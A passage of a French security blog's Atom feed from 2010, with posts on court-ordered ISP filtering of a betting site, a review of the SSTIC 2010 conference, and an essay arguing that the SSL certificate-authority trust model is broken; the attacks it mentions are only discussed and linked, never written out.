href="http://www.pcinpact.com/actu/news/58678-arjel-blocage-filtrage-fai-jeux.htm"&gt;décision de justice&lt;/a&gt; obtenue par l'&lt;a href="http://www.arjel.fr/"&gt;ARJEL&lt;/a&gt;, qui impose aux FAI de filtrer le site de paris en ligne &lt;a href="http://www.stanjames.com/"&gt;www.stanjames.com&lt;/a&gt;. Notez que l'ARJEL a invoqué la protection des mineurs et la lutte contre le financement du terrorisme pour arriver à ce résultat.&amp;nbsp;Ça&amp;nbsp;marche à tous les coups (ou presque).&lt;br /&gt;&lt;br /&gt;A titre personnel, il me semble extrêmement hasardeux de jouer sur un site qui n'a pas été &lt;a href="http://www.arjel.fr/-Liste-des-operateurs-agrees-.html"&gt;agréé par l'ARJEL&lt;/a&gt;. L'ARJEL compte d'excellents techniciens. Les exigences de sécurité produites sont sérieuses et vérifiées avec soin, ce qui permet d'éviter de nombreuses fraudes.&lt;br /&gt;&lt;br /&gt;Néanmoins cette décision relance encore une fois le débat sur la &lt;a href="http://www.zdnet.fr/actualites/neutralite-du-net-malgre-les-dementis-de-google-et-verizon-la-fcc-hausse-le-ton-39753720.htm"&gt;neutralité du Net&lt;/a&gt;. Il est évident que si l'ARJEL crée un précédent juridique, toutes les personnes ayant connu des déboires en ligne (éditeurs de contenus, &lt;a href="http://bluetouff.com/2010/05/29/le-senateur-masson-vs-lanonymat-des-blogs-xptdr-lol-2-0-proxy-vpn-offshorehosting-tor/"&gt;hommes politiques&lt;/a&gt;, &lt;a href="http://en.wikipedia.org/wiki/Project_Chanology"&gt;scientologues&lt;/a&gt;, et autres) vont s'abattre sur Internet comme la vérole sur le bas-clergé.&lt;br /&gt;&lt;br /&gt;Accessoirement, en fonction des mesures effectivement mises en place par les FAI (ou pas), je vous laisserai vous exprimer dans les commentaires pour suggérer les méthodes de contournement les plus élégantes. Mais le fond du débat n'est pas technique. D'ailleurs il semblerait que cette fois-ci, l'éditeur du site se soit &lt;a href="http://www.pcinpact.com/actu/news/58745-stanjames-blocage-compte-arjel-france.htm"&gt;sabordé de lui-même&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"&gt;*&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; text-align: center;"&gt;* *&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Ces deux actualités laissent à penser qu'on s'oriente vers la nécessité de disposer d'un équipement de connexion "approuvé" pour pouvoir accéder à un Internet dont le contenu est soigneusement contrôlé. Ça ne vous rappelle rien ? Ça n'est sans doute pas pour rien que le pôle Sytem@tic a donné des sous à Archos pour construire le &lt;a href="http://www.archoslounge.net/System-tic-reparti-pour-un-tour,9476.html"&gt;Minitel 2.0&lt;/a&gt; !&lt;br /&gt;&lt;br /&gt;"&lt;i&gt;Corruptissima republica plurimae leges&lt;/i&gt;"&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;Promis j'arrête les citations :)&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4381659289609796536?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4381659289609796536/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4381659289609796536' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4381659289609796536'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4381659289609796536'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/08/interlude-dactualite.html' title='Interlude d&apos;actualité'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6792119251534669788</id><published>2010-06-28T22:00:00.000+02:00</published><updated>2010-06-28T22:36:13.720+02:00</updated><title type='text'>Un compte-rendu à froid de SSTIC 2010 (1ère partie)</title><content type='html'>Ça&amp;nbsp;y est, &lt;a href="http://www.sstic.org/2010/conference/"&gt;SSTIC 2010&lt;/a&gt; est mort et enterré. Désormais ce sont &lt;a href="http://conference.hitb.org/hitbsecconf2010ams/"&gt;HITB Amsterdam&lt;/a&gt;, &lt;a href="http://www.blackhat.com/html/bh-us-10/bh-us-10-home.html"&gt;BlackHat US&lt;/a&gt; et &lt;a href="https://www.defcon.org/html/defcon-18/dc-18-index.html"&gt;Defcon 18&lt;/a&gt; qui font le &lt;i&gt;buzz&lt;/i&gt;. Un clou chasse l'autre.&lt;br /&gt;&lt;br /&gt;Quant à SSTIC 2010, les &lt;a href="http://communaute.sstic.org/SSTIC2010/Presse"&gt;comptes rendus&lt;/a&gt; techniques détaillés ne manquent pas, c'est pourquoi je ne vais absolument pas vous décrire les conférences par le menu. Ce qui m'intéresse c'est plutôt de répondre à quelques questions essentielles concernant le SSTIC.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;Le SSTIC est-il une conférence élitiste ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Bien sûr ! N'importe quel participant à SSTIC combine les trois facteurs suivants (hors agences gouvernementales) :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Il peut se payer une conférence à 240 euros (ce qui reste malgré tout raisonnable comparé aux conférences anglo-saxonnes) ;&lt;/li&gt;&lt;li&gt;Il peut s'absenter 3 jours consécutifs de son poste de travail (parfois sans prendre de congés) pour partir à Rennes, ce qui démontre une grande liberté au sein de son entreprise (par exemple c'est un chercheur) ;&lt;/li&gt;&lt;li&gt;Il peut malgré tout payer avec une CB en moins de 36h sur un site ne supportant qu'Internet Explorer, ce qui prouve qu'il s'abstrait du processus d'achat de son entreprise.&lt;/li&gt;&lt;/ul&gt;Le public du SSTIC est donc trié sur le volet par ces prérequis. Si vous cherchez une conférence pas chère, facile d'accès et hors temps de travail, il faut plutôt vous tourner vers la &lt;a href="http://nuitduhack.com/"&gt;Nuit du Hack&lt;/a&gt;. Vous ne serez pas dépaysés : dans les deux cas, les sponsors sont venus pour &lt;a href="http://www.agarik.com/img/entreprise/geek/affiche_big.jpg"&gt;recruter&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;La DGSE sait-elle casser RSA-1024 ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Visiblement demander à la DGSE si RSA-1024 est à la portée de ses puissances de calcul considérables (4ème plus gros client mondial de la société Xilinx, de l'aveu de l'intervenant) &lt;a href="http://blog.esiea-recherche.eu/2010/06/conference-douverture-de-la-dgse-au.html"&gt;rend intelligent&lt;/a&gt;. Je suis flatté :)&lt;br /&gt;&lt;br /&gt;Néanmoins la question reste pertinente, quand on voit que l'&lt;a href="http://www.securite-informatique.gouv.fr/gp_article709.html"&gt;ANSSI écrit&lt;/a&gt; :&lt;br /&gt;&lt;br /&gt;"&lt;i&gt;Depuis 2004, l'ANSSI recommande d'utiliser des tailles de clés RSA d'au moins 1536 bits, soit exactement le double de la taille qui vient d'être factorisée, pour un usage ne dépassant pas l'année 2010. Cette exigence est portée à 2048 bits pour un usage ne dépassant pas 2020. Ces tailles de clés, portées par le référentiel général de sécurité (RGS), permettent de garantir un bon niveau de sécurité au vu de l'état de l'art cryptographique et des puissances de calcul actuels.&lt;/i&gt;"&lt;br /&gt;&lt;br /&gt;Tout le problème (l'intervenant n'a pas manqué de le soulever) consiste à déterminer si une faille est plus utile en attaque ou en défense. C'est aussi le cas des &lt;i&gt;backdoors&lt;/i&gt;, qui ne sont que des failles introduites à dessein.&lt;br /&gt;&lt;br /&gt;Contrairement à ce qu'on pourrait penser, concevoir une bonne &lt;i&gt;backdoor&lt;/i&gt;&amp;nbsp;n'est pas simple. Par exemple les &lt;a href="http://expertmiami.blogspot.com/2008/06/francaises-francais-time-to-bend-over.html"&gt;affaiblissements cryptographiques&lt;/a&gt; placés dans les &lt;a href="http://expertmiami.blogspot.com/2010/05/exception-culturelle.html"&gt;versions françaises&lt;/a&gt; de Windows sont catastrophiques, car elles permettent à toute personne qui en a connaissance de nous attaquer, alors que les autres n'y sont pas vulnérables.&lt;br /&gt;&lt;br /&gt;La récente &lt;i&gt;backdoor &lt;/i&gt;dans &lt;a href="http://forums.unrealircd.com/viewtopic.php?t=6562"&gt;UnrealIRCd&lt;/a&gt; appartient à la catégorie des "mauvaises" backdoors : toute personne qui en a connaissance peut l'exploiter. On peut noter toutefois qu'il s'agit d'un cas d'école de dissimulation de code source, qui remonte au moins à novembre 2009. Je ne ferai pas de commentaire sur la sécurité induite par la disponibilité du code source :)&lt;br /&gt;&lt;br /&gt;La &lt;i&gt;backdoor&lt;/i&gt; dans (feu) &lt;a href="http://www.hsc.fr/ressources/veille/sbox.html.fr"&gt;SecurityBox Freeware&lt;/a&gt; était mieux faite, car elle n'était utilisable que par celui qui détient la partie privée de la clé de recouvrement … RSA-1024 !&lt;br /&gt;&lt;br /&gt;En résumé, laisser croire aux civils que RSA-1024 est sûr en 2010 me semblerait être un jeu dangereux, s'il s'avérait que n'importe quel gouvernement sait le "casser". Mais je ne m'attendais pas à une réponse :)&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;La conférence sur Facebook était-elle bien ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;De nombreux comptes rendus soulignent l'intérêt et la qualité de la conférence sur les &lt;a href="http://www.sstic.org/2010/presentation/Applications_Facebook_Quels_Risques_pour_l_Entreprise/"&gt;attaques Facebook&lt;/a&gt;, d'autant qu'elle a été assurée par des stagiaires n'ayant pas une grande expérience des interventions publiques (si j'ai bien compris).&lt;br /&gt;&lt;br /&gt;Je n'ai jamais douté du fait que des stagiaires (bien encadrés) soient capables de produire du travail de qualité :)&lt;br /&gt;&lt;br /&gt;Mais il me semble que les gens viennent dans les conférences de sécurité comme au &lt;a href="http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html"&gt;cirque&lt;/a&gt; : pour se faire peur. En tout cas c'est ce qui ressort des communications agressives telles que celle de &lt;a href="http://seclists.org/fulldisclosure/2010/Jun/43"&gt;Laurent Oudot&lt;/a&gt; avant SyScan ou de l'éternel « &lt;i&gt;Big One&lt;/i&gt; » promis chaque année à Black Hat US – sans parler de la conférence &lt;a href="http://www.esiea-recherche.eu/iawacs_2009.html"&gt;iAWACS&lt;/a&gt; (&lt;i&gt;International Alternative Workshop on &lt;u&gt;Aggressive &lt;/u&gt;Computing and Security&lt;/i&gt;) sous-titrée "&lt;i&gt;the no-limit workshop&lt;/i&gt;" pour ceux qui n'auraient pas compris.&lt;br /&gt;&lt;br /&gt;Dans ces conditions, toute intervention qui vient avec une aura « offensive » bénéficie d'une surprime non négligeable sur une intervention « défensive ». Notez que cela ne me choque pas à titre personnel (je fais partie du spectacle), mais ça fait tâche avec le discours de clôture évoquant la prépondérance de la défense sur l'attaque dans la doctrine gouvernementale et l'intérêt marginal à découvrir de nouvelles failles alors qu'on peine à corriger les failles connues.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;La conférence sur &lt;a href="http://mlstate.com/opa/download_opa"&gt;OPA&lt;/a&gt; était-elle de trop ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Voilà un sujet polémique comme je les aime :) Il suffit de suivre l'échange de &lt;a href="http://sid.rstack.org/blog/index.php/412-en-direct-du-sstic-la-revanche#comments"&gt;commentaires&lt;/a&gt; sur le blog de Cédric Blancher, et le billet &lt;a href="http://sid.rstack.org/blog/index.php/414-pourquoi-tant-de-haine"&gt;entièrement consacré&lt;/a&gt; à cette conférence, pour voir que la critique (même constructive) déchaîne les passions.&lt;br /&gt;&lt;br /&gt;Pour essayer de m'insérer subtilement dans le débat, il me semblerait faux de dire que SSTIC donne la prime aux vieux cons (comme moi). D'ailleurs n'ai-je point dit le plus grand bien de la conférence sur le &lt;i&gt;hacking&lt;/i&gt; Facebook ? :)&lt;br /&gt;&lt;br /&gt;Maintenant, il est clair que l'objectif d'une conférence de 30 minutes n'est pas d'apprendre quelque chose à l'auditoire. Je ne pense pas que quelqu'un soit capable d'initialiser la structure &lt;a href="http://www.ivanlef0u.tuxfamily.org/?p=122"&gt;VMCS&lt;/a&gt; du processeur Intel après avoir vu la présentation sur &lt;a href="http://www.sstic.org/2010/presentation/virtdbg/"&gt;VirtDbg&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;L'objectif est de "montrer ce qui se fait", et &lt;i&gt;in fine&lt;/i&gt; d'esbaudir l'auditeur pour lui délivrer un message. D'ailleurs les conférences américaines à spectacle (de type Black Hat) font venir des intervenants récurrents et rémunérés pour assurer le spectacle (Dan Kaminsky, Joanna Rutkowska, H.D. Moore, etc.). En ce sens la conférence d'&lt;a href="http://www.sstic.org/2010/presentation/Interessez_vous_au_droit/"&gt;Eric Barbry&lt;/a&gt; était parfaite :)&lt;br /&gt;&lt;br /&gt;J'ai regardé l'outil OPA et techniquement il mérite d'être sauvé. Car il tente de réaliser le vieux rêve de l'informatique moderne (dont il a encore été question au &lt;a href="http://www.forumatena.org/?q=node/269"&gt;Forum Atena&lt;/a&gt; aujourd'hui) : repartir de zéro. Faire table rase des erreurs du passé, et proposer un système nativement sûr aux développeurs.&lt;br /&gt;&lt;br /&gt;Malheureusement la présentation qui en a été faite était de loin la plus élitiste … car j'ai quand même vaguement eu l'impression d'avoir été pris pour un neuneu ! Et là, le message n'est pas forcément passé.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;&lt;i&gt;Est-ce qu’on est tous foutus ?&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Désolé, mais mon commentaire sur la conférence de clôture fera l'objet d'un billet à part entière :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6792119251534669788?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6792119251534669788/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6792119251534669788' title='5 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6792119251534669788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6792119251534669788'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/06/un-compte-rendu-froid-de-sstic-2010.html' title='Un compte-rendu à froid de SSTIC 2010 (1ère partie)'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7594811292437621595</id><published>2010-04-20T11:15:00.001+02:00</published><updated>2010-04-20T17:15:44.632+02:00</updated><title type='text'>SSL est cassé</title><content type='html'>(Notez que j'ai soigneusement évité "l'échec de SSL" comme titre, mais je n'en pense pas moins :)&lt;br /&gt;&lt;h1&gt;Ce dont je ne vais pas parler&lt;/h1&gt;&lt;ul&gt;&lt;li&gt;Si vous êtes un tant soit peu versés dans la technique, vous avez probablement entendu parler de la &lt;a href="http://eprint.iacr.org/2010/006.pdf"&gt;factorisation d'une clé RSA-768&lt;/a&gt; par l'INRIA.&lt;/li&gt;&lt;/ul&gt;La puissance de calcul mise en œuvre pour cette "prouesse" laisse penser que la NSA sait faire la même chose en une semaine (sans parler de notre &lt;a href="http://www-lmj.cea.fr/fr/programme_simulation/tera.htm"&gt;machine TERA&lt;/a&gt;, bien française).&lt;br /&gt;&lt;br /&gt;Accessoirement, il est amusant de constater que des clés 768 bits sont utilisées par les &lt;a href="http://www.parodie.com/monetique/news072001.htm"&gt;cartes EMV&lt;/a&gt; en remplacement de la clé 320 bits qui a été factorisée par Serge Humpich …&lt;br /&gt;&lt;br /&gt;… mais RSA-1024 reste aujourd'hui impossible à factoriser par le grand public.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous avez également entendu parler de &lt;a href="http://www.thoughtcrime.org/software/sslstrip/"&gt;SSLStrip&lt;/a&gt;, par Moxie Marlinspike.&lt;/li&gt;&lt;/ul&gt;Une attaque man-in-the-middle "basique" qui réécrit les liens HTTPS en HTTP. Très efficace contre les &lt;a href="http://fr.wikipedia.org/wiki/Univers_de_Harry_Potter#Moldus"&gt;moldus&lt;/a&gt;&amp;nbsp;de l'informatique … mais qui n'affecte pas les outils automatiques (bien configurés) ou les geeks qui ont mis tous les sites critiques en "&lt;a href="http://www.ghacks.net/2009/03/31/force-ssl-https-connections-in-noscript/"&gt;HTTPS forcé&lt;/a&gt;" dans NoScript (ou qui utilisent des &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/12714"&gt;add-ons&lt;/a&gt; &lt;a href="https://crypto.stanford.edu/forcehttps/"&gt;dédiés&lt;/a&gt;).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous avez entendu parler de l'attaque d'Alexander Sotirov, ayant exploité les faiblesses de MD5 pour générer &lt;a href="http://www.phreedom.org/research/rogue-ca/"&gt;une "vraie-fausse" autorité de certification&lt;/a&gt; parfaitement valide et largement reconnue ?&lt;/li&gt;&lt;/ul&gt;Beau travail … mais la plupart des implémentations ont blacklisté ce certificat.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous avez entendu parler de &lt;a href="http://it.slashdot.org/story/09/11/16/2327230/SSL-Renegotiation-Attack-Becomes-Real"&gt;l'attaque en renégociation&lt;/a&gt;, qui permet d'injecter des données en aveugle au début d'une session TLS ?&lt;/li&gt;&lt;/ul&gt;Désolé … mais là encore c'est patché presque partout.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous êtes assez vieux pour avoir entendu parler de la &lt;a href="http://www.cert.org/advisories/CA-2002-27.html"&gt;faille OpenSSL&lt;/a&gt; exploitée par le ver Slapper en 2002 ?&lt;/li&gt;&lt;/ul&gt;C'est patché partout … ou presque (n'est-ce pas PolyCom ? ;).&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous avez entendu parler d'un "&lt;a href="http://blog.rominet.net/2008/05/debianopenssl-debacle.html"&gt;petit problème&lt;/a&gt;" d'entropie dans Debian ?&lt;/li&gt;&lt;/ul&gt;Rassurez-vous, ça devrait normalement être patché (&lt;a href="http://codefromthe70s.org/sslblacklist-badcerts.aspx"&gt;presque&lt;/a&gt;) partout …&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Vous utilisez GnuTLS ?&lt;/li&gt;&lt;/ul&gt;Bon là c'est &lt;a href="http://www.openldap.org/lists/openldap-devel/200802/msg00072.html"&gt;sans espoir&lt;/a&gt;, désolé !&lt;br /&gt;&lt;br /&gt;Bref, vous êtes un technicien. Mais saviez-vous que le modèle SSL est fondamentalement cassé ?&lt;br /&gt;&lt;h1&gt;&lt;i&gt;La&lt;/i&gt; faille dans SSL&lt;/h1&gt;&lt;a href="http://fr.wikipedia.org/wiki/Secure_Sockets_Layer"&gt;SSL&lt;/a&gt;, un protocole conçu par Netscape pour le e-commerce, est là pour assurer la confiance.&lt;br /&gt;&lt;br /&gt;Pour faire simple, il existe deux modèles de confiance en informatique: le modèle "pair à pair", utilisé par GPG, et le modèle "à site central", utilisé par SSL.&lt;br /&gt;&lt;br /&gt;Dans le premier modèle, vous faites confiance à un inconnu parce que vous l'avez rencontré au moins une fois, ou quelqu'un que vous connaissez l'a rencontré au moins une fois. C'est relativement fiable (quoique l'expérience des réseaux sociaux montre qu'on a tendance à faire confiance un peu trop vite), mais ça passe difficilement à l'échelle.&lt;br /&gt;&lt;br /&gt;Dans le deuxième modèle, vous faites confiance à un inconnu parce qu'il existe une autorité d'enregistrement mondiale qui a "vérifié" tous les inconnus. Ca passe très bien à l'échelle, mais ça suppose une confiance inébranlable dans l'autorité "racine". Or c'est là que le bât blesse.&lt;br /&gt;&lt;br /&gt;Car l'autorité ne gagne pas d'argent (oui, accessoirement, c'est une activité lucrative) à chaque fois que vous désirez vérifier l'identité d'un inconnu. L'autorité gagne de l'argent à chaque fois qu'elle enregistre un nouvel inconnu. Et donc son &lt;i&gt;business model&lt;/i&gt; est d'enregistrer un maximum d'inconnus le plus rapidement possible, en minimisant les vérifications.&lt;br /&gt;&lt;br /&gt;Ceci étant posé, quelles sont alors les véritables attaques contre SSL ?&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Les "fusions acquisitions"&lt;/li&gt;&lt;/ul&gt;Et oui, la vie est dure, et vendre de la confiance ne rapporte pas suffisamment d'argent. Il y a donc des autorités racines qui ont duré moins longtemps que leur certificat (soit 20 ou 30 ans) et qui ont été rachetées.&lt;br /&gt;&lt;br /&gt;C'est ainsi qu'on a pu voir sur la liste des développeurs Mozilla une discussion intéressante autour de la question "&lt;a href="http://groups.google.com/group/mozilla.dev.security.policy/browse_thread/thread/b6493a285ba79998/26fca75f9aeff1dc"&gt;qui possède la racine RSA Security 1024 V3&lt;/a&gt; ?".&lt;br /&gt;&lt;br /&gt;Tout est bien qui finit bien, puisque la racine en question appartenait bien à la société RSA, qui avait simplement arrêté de maintenir les points de contact identifiés dans la CA. Et qui a donné son feu vert pour supprimer purement et simplement cette CA de la liste des autorités racine de confiance.&lt;br /&gt;&lt;br /&gt;Aucune autorité "majeure" n'a complètement disparu à ma connaissance, mais je n'exclus pas que le HSM d'une autorité racine puisse se retrouver un jour &lt;a href="http://www.alibaba.com/product-free/100507357/Luna_Ca3_Root_Key_Management_System.html"&gt;en vente sur eBay&lt;/a&gt; …&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La sous-traitance&lt;/li&gt;&lt;/ul&gt;Pour vendre partout, il faut passer par des partenaires locaux. Par exemple en France, &lt;a href="http://wiki.gandi.net/fr/ssl"&gt;Gandi&lt;/a&gt; revend des certificats signés par "&lt;a href="http://www.usertrust.com/index.asp"&gt;UTN – DATACorp&lt;/a&gt;", c'est-à-dire Comodo.&lt;br /&gt;&lt;br /&gt;Les partenaires n'adhèrent pas forcément avec zèle à la &lt;a href="http://www.securite-informatique.gouv.fr/gp_article70.html"&gt;DPC&lt;/a&gt; du fournisseur.&amp;nbsp;C'est ainsi qu'un &lt;a href="https://blog.startcom.org/?p=145"&gt;"vrai-faux" certificat Mozilla&lt;/a&gt; a pu être obtenu sans aucune vérification auprès d'un sous-traitant de Comodo.&lt;br /&gt;&lt;br /&gt;Pourtant d'un point de vue technique, la "confiance" est binaire: soit le navigateur accepte le certificat, soit il le rejette. Il n'y a pas de score attaché au sous-traitant qui a délivré le certificat …&lt;br /&gt;&lt;ul&gt;&lt;li&gt;La prolifération des autorités racines&lt;/li&gt;&lt;/ul&gt;Entendons nous bien: je parle ici des "vraies" autorités, celles qui paient pour être &lt;a href="http://technet.microsoft.com/en-us/library/cc751157.aspx"&gt;intégrées à Windows&lt;/a&gt; ou aux navigateurs.&lt;br /&gt;&lt;br /&gt;Le débat a enflammé la liste de discussions des développeurs Mozilla: faut-il intégrer &lt;a href="http://www.freedom-to-tinker.com/blog/felten/mozilla-debates-whether-trust-chinese-ca"&gt;une autorité de certification chinoise&lt;/a&gt; par défaut dans le navigateur ?&lt;br /&gt;&lt;br /&gt;Sans rentrer dans le débat politique, on notera qu'il existe déjà plein d'autorités nationales. Comme une autorité hongroise, dont &lt;a href="http://www.e-szigno.hu/SZSZ/"&gt;la DPC n'a pas été traduite&lt;/a&gt; dans d'autres langues que le hongrois. Difficile de construire la confiance la dessus ...&lt;br /&gt;&lt;ul&gt;&lt;li&gt;L'appât du gain&lt;/li&gt;&lt;/ul&gt;Je ne parlerai pas de la supercherie qu'est &lt;a href="http://en.wikipedia.org/wiki/Extended_Validation_Certificate"&gt;EV-SSL&lt;/a&gt;, c'est-à-dire une tentative pour mettre fin à ces dérives sur le principe du "&lt;i&gt;plus les gens paient cher, plus on peut leur faire confiance&lt;/i&gt;".&amp;nbsp;Ou, pour le dire autrement, "&lt;i&gt;les gens les plus riches sont forcément les plus honnêtes&lt;/i&gt;" …&lt;br /&gt;&lt;br /&gt;Non, la dérive dont je veux parler, c'est la délivrance de certificats gratuits, mais à courte durée de vie. C'est évidemment un abus de confiance: s'il est possible d'obtenir chez VeriSign un certificat de signature d'une durée de vie de 60 jours sans présenter aucun justificatif, alors cela permet de &lt;a href="http://cryptopath.wordpress.com/2010/01/29/iphone-certificate-flaws/"&gt;compromettre l'iPhone&lt;/a&gt;, mais également de signer un exécutable ou une macro Office pour une attaque "&lt;i&gt;one shot&lt;/i&gt;".&lt;br /&gt;&lt;ul&gt;&lt;li&gt;L'interception légale&lt;/li&gt;&lt;/ul&gt;&lt;i&gt;Last but not least&lt;/i&gt;, il faut noter que les équipements d'interception légale pratiquent le &lt;i&gt;spoofing &lt;/i&gt;SSL sans problème. Comment ? Tout simplement avec la coopération de quelques autorités racine nationales, qui délivrent les certificats ad-hoc. Vous pourrez lire le papier &lt;a href="http://files.cloudprivacy.net/ssl-mitm.pdf"&gt;ici&lt;/a&gt;, ou le &lt;a href="http://www.crypto.com/blog/spycerts/"&gt;compte-rendu&lt;/a&gt; &lt;a href="http://www.wired.com/threatlevel/2010/03/packet-forensics/"&gt;dans la presse&lt;/a&gt;.&lt;br /&gt;&lt;h1&gt;Y a-t-il une solution ?&lt;/h1&gt;Pour être honnête, je ne pense pas qu'une solution puisse venir du "marché". Car si la confiance a un prix, alors il y aura toujours quelqu'un pour payer. Après tout la mafia russe a bien monté &lt;a href="http://dc214.defcon.org/notes/june_2005/dc214_sn_orgcrime.ppt"&gt;son propre FAI&lt;/a&gt;, pourquoi n'aurait-elle pas sa propre autorité de certification ?&lt;br /&gt;&lt;br /&gt;La solution technique &lt;i&gt;théorique &lt;/i&gt;au problème est la révocation. Mais ça ne marche pas du tout. Par exemple la sécurité du système Symbian 9 est basée sur ce mécanisme, mais les opérateurs de téléphonie mobile &lt;a href="http://www.f-secure.com/weblog/archives/00001918.html"&gt;ne l'activent pas&lt;/a&gt; (pour des raisons essentiellement économiques).&lt;br /&gt;&lt;br /&gt;Et quand VeriSign a délivré un "vrai-faux" certificat Microsoft, il a bien fallu &lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS01-017.mspx"&gt;pousser une liste de révocation "en dur"&lt;/a&gt; par Windows Update, car aucun client ne vérifiait correctement les révocations.&lt;br /&gt;&lt;br /&gt;En attendant, les geeks peuvent toujours utiliser des extensions comme "&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/7974"&gt;Perspectives&lt;/a&gt;" ou "&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6415"&gt;Certificate Patrol&lt;/a&gt;". Ca peut toujours servir ;)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://newsoft.dyndns.org/blog/ssl_fail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://newsoft.dyndns.org/blog/ssl_fail.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;Ma conclusion est simple: le modèle de sécurité des autorités de certification ne vous protège que contre les attaques passives (écoute d'une connexion SSL). Mais pas contre les attaques actives (&lt;/span&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;man-in-the-middle&lt;/span&gt;&lt;/i&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt; SSL, authentification par certificat client, signature de code, etc.). Et ça n'est pas prêt de changer.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7594811292437621595?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7594811292437621595/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7594811292437621595' title='13 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7594811292437621595'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7594811292437621595'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2010/04/ssl-est-casse.html' title='SSL est cassé'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>13</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3564333728972795619</id><published>2010-01-23T20:30:00.000+01:00</published><updated>2010-01-23T20:40:28.756+01:00</updated><title type='text'>Interlude récréationnel</title><content type='html'>&lt;a href="http://twitter.com/VUPEN/status/8078890705"&gt;Petite perle&lt;/a&gt; dans ma &lt;em&gt;mailbox&lt;/em&gt; ce 